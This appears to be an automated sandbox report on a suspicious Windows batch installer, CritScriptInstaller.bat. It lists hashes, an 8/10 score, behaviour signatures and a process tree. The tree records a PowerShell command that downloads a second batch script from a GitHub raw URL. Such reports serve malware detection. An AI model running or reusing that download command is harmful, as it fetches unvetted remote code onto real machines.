Analysis
-
max time kernel
74s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
23-11-2024 17:40
Static task
static1
Behavioral task
behavioral1
Sample
CritScriptInstaller.bat
Resource
win7-20241010-en
windows7-x64
4 signatures
150 seconds
General
-
Target
CritScriptInstaller.bat
-
Size
6KB
-
MD5
a3ea9257f9f074a20df56d8978be9e77
-
SHA1
68d029092c7a591aac215e25269329c3c3859436
-
SHA256
32d2658a968790aa0039cf23fd097da860b938fb07d8d0b2f6779a71f40817b1
-
SHA512
a61143e0680eb03fbf625da8a58aa338e88f0e12c65a3c07b2c10eead02e7a753d64e3d4271c34b04941ef772d3e772f28b53355b1a46ce4fc6aafff164c3b46
-
SSDEEP
192:k+6tCGPbseHYtPpUaYIKopCA8KyiXn2rCxHF:kviPpUaYIKor2i
Score
8/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2224 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2224 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 1736 wrote to memory of 2224 1736 cmd.exe 31 PID 1736 wrote to memory of 2224 1736 cmd.exe 31 PID 1736 wrote to memory of 2224 1736 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\CritScriptInstaller.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/CritScript.bat' -OutFile CritScript.bat"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224
-